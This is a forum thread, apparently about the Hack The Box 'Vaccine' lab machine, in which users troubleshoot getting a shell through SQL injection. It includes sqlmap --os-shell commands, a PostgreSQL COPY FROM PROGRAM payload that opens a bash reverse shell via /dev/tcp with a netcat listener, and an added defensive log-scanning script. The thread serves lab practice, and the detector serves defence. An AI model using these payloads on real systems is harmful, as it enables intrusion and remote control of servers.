Machine name: vaccine stuck on getting SQL code execution shell

@henriqscx said:

I understand the vulnerability, thanks to the link posted by @florianges. I can also read and understand the python script. How did you learn about dashboard.php?

Bruteforce the website. Use either dirbuster, dirsearch, or gobuster with a wordlist of known files/directories and it will pop up.

Try the latest version of sqlmap cloned directly from github

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

python3 sqlmap.py -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=34ql3d0nei22lo6vck50pq0fd1" --os-shell

that worked for me.

@BHCisc0 said:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Thx, it works!

Hey! Vaccine seems to not be working properly, this is my nmap scan output:

Starting Nmap 7.91 ( hxxps://nmap.org ) at 2020-11-30 12:56 EST
Nmap scan report for 10.10.10.46
Host is up (0.058s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
1720/tcp open h323q931?
6000/tcp closed X11
6001/tcp closed X11:1
6002/tcp closed X11:2
6003/tcp closed X11:3
6004/tcp closed X11:4
6005/tcp closed X11:5
6006/tcp closed X11:6
6007/tcp closed X11:7
6009/tcp closed X11:9
6025/tcp closed x11
6059/tcp closed X11:59

Service detection performed. Please report any incorrect results at hxxps://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 182.54 seconds

Yesterday it was reported as down by Nmap, any idea on what’s going on?

This machine is unstable. I mean that after a couple of shell operations, like a revshell to your machine, the database collapses.

The first symptom is that your revshell disconnects.
The second stage is a message from sqlmap:
[15:29:35] [CRITICAL] unsupported feature on versions of PostgreSQL before 8.2
The third is that even the vaccine website cannot connect to the database (so no cars and parameters are visible after login), and neither can sqlmap.

It takes about 1hr to work, so leave it untouched for 1hr and then come back.

Hi there,

I am stuck on this box thanks to this. It is second stage:

[15:29:35] [CRITICAL] unsupported feature on versions of PostgreSQL before 8.2

I have had the database collapse entirely e.g. no cars to display at all but that has resolved itself. I have been attacking this box for days now and it is getting tedious. I have voted to reset the box over and over again, and sometimes waited until the next day to try it again, still getting this error:

[15:29:35] [CRITICAL] unsupported feature on versions of PostgreSQL before 8.2

Is there any way to manually perform the SQL injection to speed things up/bypass this error? Any suggestions would be appreciated, as I am beginning to lose my mind on this one.

ALSO: I did perform a particularly aggressive SQLmap scan which worked last night, I used:
sqlmap --flush-session --risk=3 --level=5 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords -u 'http://10.10.10.46/dashboard.php?search=alpha' --cookie="PHPSESSID:pft1e158fgiviqfnp8qs66rk6s" --os-shell

However, the scan took so long that I forgot to keep an eye on my NetCat listener, and missed my chance to spin up the reverse shell. Kicking myself for this. Does anyone have any idea why this particularly verbose scan worked as opposed to the ordinary one?

Kind regards,
slugpockets

My output is

Resetting the machine worked for me

Hello guys. So I’ve been trying everything with this same error everyone was talking about, and instead of searching for A on the target’s website I simply tried other search results to generate different cookie values. For example, in my case I tried refreshing the index.php page and searching ‘S’, then copied my cookies and was able to gain os-shell at last! Hope that helps.

There are two ways to try:
1. sqlmap with --flush-session --time-sec=20
2. Resetting the machine

However, I also encountered this: if I manually perform the SQL injection first, then sqlmap won’t show it as vulnerable when scanned again. I must reset the machine. Why?

Guys I was stuck at sqlmap not giving me the shell and after trying many things, a simple sudo sqlmap gave the expected result, so try that too if you have trouble too!

Thanks, that helped me a lot and solved my problem!

For those who still can’t get sqlmap to work, here is a manual method to spawn a shell.

  • Payload
x'; COPY cars FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/{YOUR_IP}/7777 0>&1"' --

YOUR_IP is your machine’s IP (if using OpenVPN, use the tun0 interface’s IP).
Note: cars here is a valid table in the database. Database schema and table names can be exfiltrated through various SQLi techniques.

  • Listener
nc -nvlp 7777
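
Added example, not part of the original post: a defender-side check that scans web access logs for the request shape shown above (a closing quote followed by a stacked statement, and COPY ... FROM PROGRAM). The log lines, function names and the placeholder command are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines; the injected command is a harmless placeholder.
SAMPLE_LOG = [
    '10.10.14.2 - - [01/Jan/2021:10:00:01 +0000] "GET /dashboard.php?search=Sandy HTTP/1.1" 200 2312',
    '10.10.14.2 - - [01/Jan/2021:10:00:09 +0000] "GET /dashboard.php?search=x%27%3B+COPY+cars+FROM+PROGRAM+%27id%27+-- HTTP/1.1" 200 2312',
    '10.10.14.2 - - [01/Jan/2021:10:00:15 +0000] "GET /dashboard.php?search=copy+of+program HTTP/1.1" 200 2312',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# A quote that closes the original string literal, followed by a statement separator.
STACKED = re.compile(r"'\s*;")
# COPY <table> FROM|TO PROGRAM makes the PostgreSQL server run an OS command.
COPY_PROGRAM = re.compile(r"\bcopy\b.{0,200}?\b(?:from|to)\s+program\b", re.I | re.S)


def flag_request(query_string):
    """Return the reasons a URL-encoded query string looks like this injection."""
    decoded = unquote_plus(query_string)
    reasons = []
    if STACKED.search(decoded):
        reasons.append("stacked statement after closing quote")
    if COPY_PROGRAM.search(decoded):
        reasons.append("COPY ... PROGRAM")
    return reasons


def scan_access_log(lines):
    """Return (line_number, reasons) for every request line that is flagged."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match or "?" not in match.group(1):
            continue
        reasons = flag_request(match.group(1).split("?", 1)[1])
        if reasons:
            hits.append((number, reasons))
    return hits


if __name__ == "__main__":
    for number, reasons in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```

PostgreSQL only runs COPY ... PROGRAM for superusers and members of pg_execute_server_program, so a web application's database role should hold neither, and the search parameter should reach the database through a parameterized query.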

I also got stuck on this machine. The answer was using:
└─$ sudo ufw allow from 10.129.162.124 (The HTB IP) proto tcp to any port 443

Took me forever to figure out.
Just triple check your ports are allowed, I swore to myself that I already opened the port.
Very easy moving forward after this.

Have you guys been able to manually do the SQLi? I tried to but I always get ERROR: unterminated quoted string at or near “'”. I wasn’t able to find columns.

Hey guys, this is a little bit late, but I also have the same problem with the SQL injection. Reading the answers above, I discovered the flags “--flush-session --time-sec=20”; put these at the end of your SQLi command:

sqlmap -u 'http://10.129.17.7/dashboard.php?search=' --cookie='PHPSESSID=4hggvt0i079k2pdv0ofvsfppd0' --os-shell --flush-session --time-sec=20